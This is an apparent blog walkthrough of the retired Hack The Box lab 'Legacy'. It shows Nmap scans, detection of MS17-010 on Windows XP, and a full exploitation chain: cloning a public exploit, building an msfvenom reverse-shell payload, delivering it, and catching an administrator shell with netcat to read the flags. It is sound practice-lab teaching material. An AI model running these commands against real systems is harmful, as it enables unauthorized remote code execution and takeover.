HTB Walkthrough : Legacy


Today we’re going to solve another window machine called “Legacy” by ch4p . It’s available on Hackthebox retired section for practice . Let ‘s get started and learn how to solve the lab .


Level : Easy

Attacking Strategy

  • Network Scanning
    • Nmap
  • Enumeration
    • Performing Nmap Script scan
  • Exploitation
    • setup virtual environment
    • exploiting MS17-010 Vulnerability
  • Privilege Escalation
    • Administrator reverse shell using netcat

Walkthrough

IP Address : 10.129.130.212

After connecting to Hackthebox network using there VPN connection , we can start our war . Without wasting too much time let start with Nmap to enumerate the running service on target machine .

Network scanning

Using Nmap we perform the aggressive scan which do version scanning, Os detection scan, Time template T4,trace route .

nmap -A 10.129.130.212 -Pn
Nmap scan report for 10.129.130.212
Host is up (0.17s latency).
Not shown: 997 filtered ports
PORT     STATE  SERVICE       VERSION
139/tcp  open   netbios-ssn   Microsoft Windows netbios-ssn
445/tcp  open   microsoft-ds  Windows XP microsoft-ds
3389/tcp closed ms-wbt-server
Service Info: OSs: Windows, Windows XP; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_xp

Host script results:
|_clock-skew: mean: 5d00h27m40s, deviation: 2h07m16s, median: 4d22h57m40s
|_nbstat: NetBIOS name: nil, NetBIOS user: <unknown>, NetBIOS MAC: 00:50:56:b9:a6:d3 (VMware)
| smb-os-discovery: 
|   OS: Windows XP (Windows 2000 LAN Manager)
|   OS CPE: cpe:/o:microsoft:windows_xp::-
|   Computer name: legacy
|   NetBIOS computer name: LEGACY\x00
|   Workgroup: HTB\x00
|_  System time: 2021-04-25T21:15:31+03:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_smb2-time: Protocol negotiation failed (SMB2)

In output it show that SMB service is running on port 445 on target machine and it also show that target machine is window XP machine , as i see the window XP there are very famous exploit in the market like eternal blue , ms17-010 ,etc . For confirming we gonna try the Nmap script scan .

Enumeration

Now we know that target machine is window XP and for confirming we gonna see for any famous vulnerability , for that Nmap script scan is good . Nmap Scripts are located at /usr/share/nmap/scripts .

nmap --script smb-vuln* -p 445 10.129.130.212 -Pn

In the output there are some serious vulnerability listed like MS08-067 and MS17-010 , so we are going to exploit MS17-010 without using the Metasploit .

Nmap scan report for 10.129.130.212
Host is up (0.17s latency).

PORT    STATE SERVICE
445/tcp open  microsoft-ds

Host script results:
| smb-vuln-ms08-067: 
|   VULNERABLE:
|   Microsoft Windows system vulnerable to remote code execution (MS08-067)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2008-4250
|           The Server service in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2,
|           Vista Gold and SP1, Server 2008, and 7 Pre-Beta allows remote attackers to execute arbitrary
|           code via a crafted RPC request that triggers the overflow during path canonicalization.
|           
|     Disclosure date: 2008-10-23
|     References:
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4250
|_      https://technet.microsoft.com/en-us/library/security/ms08-067.aspx
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: ERROR: Script execution failed (use -d to debug)
| smb-vuln-ms17-010: 
|   VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
|     Risk factor: HIGH
|       A critical remote code execution vulnerability exists in Microsoft SMBv1
|        servers (ms17-010).
|           
|     Disclosure date: 2017-03-14
|     References:
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
|       https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
|_      https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/

Exploitation

For exploitation this machine we are going to use the exploit which is available to GitHub . Now this exploit is created in python2 and it require some libraries like impacket , pycrypto . For that virtual environment has to setup and here virtualenv program help .Once you created the environment then you can activate that environment using source utility program . Here python2 is used as interpreter because in latest Kali python3 is set as global interpreter and our exploit is in python2 .

why we use virtual environment ? For that you can check out this .

virtualenv -p python2 venv
source venv/bin/activate
pip install impacket
pip install pycrypto

Once our environment is setup successfully we can work on our exploit , for that the exploit we use you can get from GitHub . After getting our exploit we have to check weather our exploit is connecting to our target machine or not or does all the prelibraries are installed properly or not so to check , checker.py is used .

If everything is good then we can exploit it easily .

git clone https://github.com/helviojunior/MS17-010.git
cd MS17-010
python checker.py legacy.htb

so our exploit is working fine and all the libraries are installed and its reachable to our target machine so let exploit the machine and get the shell .

Here reverse netcat shell payload are used which is created by using msfvenom utility .

msfvenom -p windows/shell_reverse_tcp LHOST=tun0 LPORT=4445 -f exe > shell.exe 
python send_and_execute.py legacy.htb shell.exe 445 browser

As our payload dilvery is done we get the netcat revese shell using nc .

nc -lvnp 4445
type "Administrator\Desktop\root.txt"
type "john\Desktop\User.txt"

Finally we successfully exploited the machine .

Leave a Comment

This site uses Akismet to reduce spam. Learn how your comment data is processed.